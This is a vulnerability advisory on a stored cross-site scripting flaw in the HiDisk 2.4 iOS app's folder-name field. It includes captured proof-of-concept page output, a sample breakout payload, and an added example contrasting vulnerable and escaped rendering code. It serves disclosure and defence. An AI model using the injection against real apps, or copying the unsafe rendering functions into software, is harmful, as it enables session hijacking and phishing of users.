HiDisk 2.4 iOS - (currentFolderPath) Persistent Vulnerability

Document Title:
===============
HiDisk 2.4 iOS - (currentFolderPath) Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1496


Release Date:
=============
2015-05-19


Vulnerability Laboratory ID (VL-ID):
====================================
1496


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
HiDisk is a safe, a file manager, a media player and a file reader in one app. As a safe - it provides a password system to secure your
private stuff (photos, video, audio, notes, docs, etc.). As a file manager - easily add folders and subfolders and quickly organize your files
with a few taps. As a media player - play music, voice memos and video within the app. As a file reader - it not only provides a slideshow
just like the native Photos app, but also viewing of docs (iWork, Windows Office, etc.).

(Copy of the Homepage:  https://itunes.apple.com/en/app/hidisk-pro-schutz-privat-foto/id575070537 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation vulnerability in the HiDisk v2.4 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2015-05-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Elite Tracy
Product: HiDisk - iOS Mobile Web Application 2.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official HiDisk v2.4 iOS mobile web application.
The vulnerability allows remote attackers or low-privileged user accounts to inject malicious code into the application side
of the affected mobile iOS web application.

The application-side vulnerability is located in the `name` value (currentFolderPath) of the `folder add` module. Local attackers with
low-privileged user accounts are able to inject their own malicious script code via the folder name input to compromise the `Wifi Web Access`
web interface. The attack vector is located on the application side of the Wifi Web Access interface, and the request method used to inject is
an app sync. The injection point is the add-folder input; execution occurs in the index path directory listing.

The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) score of 3.5.
Exploitation of the application-side web vulnerability requires a low-privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing, session hijacking, persistent external redirects to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                        [+] Sync

Vulnerable Module(s):
                                        [+] Folder Add ("Ordner Hinzufuegen" in the German UI)

Vulnerable Parameter(s):
                                        [+] name (currentFolderPath)

Affected Module(s):
                                        [+] Index Path Listing
                                        [+] Subfolder Path Listing


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with a low-privileged application user account and low or medium user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

PoC: #1
<a href='#' name='/"><[PERSISTENT INJECTED SCRIPT CODE!!]>' class='folder' onclick='dClickHandler(this);' style='position:relative; text-decoration:none;'>
<img class='aImg' style='' src='/Web/folder2.png' height='60px' width='60px'/><div class='name' style='position:absolute; top:1px !important; top:65px; height:17px;
left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:4px;z-index:2000;
'>"><[PERSISTENT INJECTED SCRIPT CODE!!]></div></a><a href='#' name='/hello' class='folder' onclick='dClickHandler(this);' style='position:relative; text-decoration:none;'>
<img class='aImg' style='' src='/Web/folder2.png' height='60px' width='60px'/><div class='name' style='position:absolute; top:1px !important; top:65px; height:17px;
left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:4px;z-index:2000;'>hello</div></a>
<a href='#' name='/test path var' class='folder' onclick='dClickHandler(this);' style='position:relative; text-decoration:none;'>
<img class='aImg' style='' src='/Web/folder2.png' height='60px' width='60px'/><div class='name' style='position:absolute; top:1px !important; top:65px; height:17px;
left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:4px;z-index:2000;'>
test path var</div></a><a href='#' name='/2.png' class='image' onclick='aClickHandler(this);'>
<img class='aImg' src='/2.png_THUMBNAIL' height='60px' width='60px'/></a><br/><br/><br/></div>


PoC: #2
<script type="text/javascript" src="/Web/uploadify/jquery.min.js"></script>

<script type="text/javascript" src="/Web/uploadify/jquery.uploadify.js"></script>
<script language="javascript">
var currentFolderPath = '/"><[PERSISTENT INJECTED SCRIPT CODE!!]>';

var alertMessage = "null";

var actionType = "Show";

var submitting = false;

var tipHiddenTop = -200;

var tipShownTop = -80;

var lastShownTipDate;

var uploadLimit = 2000;


if (alertMessage != "null") {

alert(alertMessage);
            }
...
 <a href="/back.html" style="text-decoration:none; position:absolute; top:0; left:0;">
<img src="/Web/back3.png" style="width:25px; height:25px; border:none; vertical-align:middle" />
Oberverzeichnis [aktuell:/"><[PERSISTENT INJECTED SCRIPT CODE!!]>]</a>
...
if (tag.className == "image") {

document.body.style.overflow = "hidden"; // prevent the body from scrolling

var wrap = document.getElementById("wrap");

wrap.style.display = "block";

var src = "/" + actionType + tag.name;
wrap.innerHTML = "<iframe id='photo-viewer' src='" + src + "' style='position:absolute;width:100%;height:100%' frameborder='no' scrolling='no' allowtransparency='yes' />";
}
else {

if (!tippable()) {


Reference(s):
http://localhost:8860/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable folder name input.
Restrict the input by disallowing special characters, and encode the folder path variable to prevent the persistent script code execution in the listing.
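The fix described above, as an added example that is not HiDisk's code: the two output contexts the PoC shows (the folder name in the listing markup, and the same value inside the `currentFolderPath` string literal in a script block) rendered first the way the captured output does it and then with encoding applied per context, plus the input restriction. The function names, the simplified markup and the sample payload are assumptions for this example.

```javascript
// Added example (not HiDisk's code). The markup is a reduced form of what the
// PoC captures; the payload is constructed for the demonstration.
const PAYLOAD = '/"><script>alert(1)</script>';

// Vulnerable: the folder name is pasted raw into an attribute value, into a
// text node, and into a single-quoted JavaScript string inside <script>.
function renderListingUnsafe(folderName) {
  return `<a href='#' name='${folderName}' class='folder' onclick='dClickHandler(this);'>` +
         `<div class='name'>${folderName}</div></a>`;
}
function renderScriptVarUnsafe(folderPath) {
  return `<script>var currentFolderPath = '${folderPath}';</script>`;
}

// HTML context (attribute values and text nodes): escape the five characters
// that can change document structure.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// JavaScript string context inside <script>: JSON-encode, then also escape the
// characters the HTML parser acts on, so a value containing "</script>" cannot
// terminate the element. U+2028/2029 are line terminators for the JS parser.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e').replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

function renderListingSafe(folderName) {
  const n = escapeHtml(folderName);
  return `<a href='#' name='${n}' class='folder' onclick='dClickHandler(this);'>` +
         `<div class='name'>${n}</div></a>`;
}
function renderScriptVarSafe(folderPath) {
  return `<script>var currentFolderPath = ${jsStringLiteral(folderPath)};</script>`;
}

// Input restriction from the advisory's fix: a folder name never needs markup
// characters. Applied at "folder add", before the value is stored.
const FOLDER_NAME_RE = /^[A-Za-z0-9 ._-]{1,64}$/;
function isAcceptableFolderName(name) {
  return FOLDER_NAME_RE.test(name) && name !== '.' && name !== '..';
}

// Counts <script start tags in rendered output; the safe listing has none and
// the safe script block has exactly the one the template emits.
function countScriptTags(html) {
  return (html.match(/<script/gi) || []).length;
}
```

Output encoding is the fix that holds even if a name slips past the input filter, which is why both are shown; the JSON-based literal also round-trips, so the app still sees the original folder path when the script runs.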


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the folder name value is estimated as medium (CVSS 3.5).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™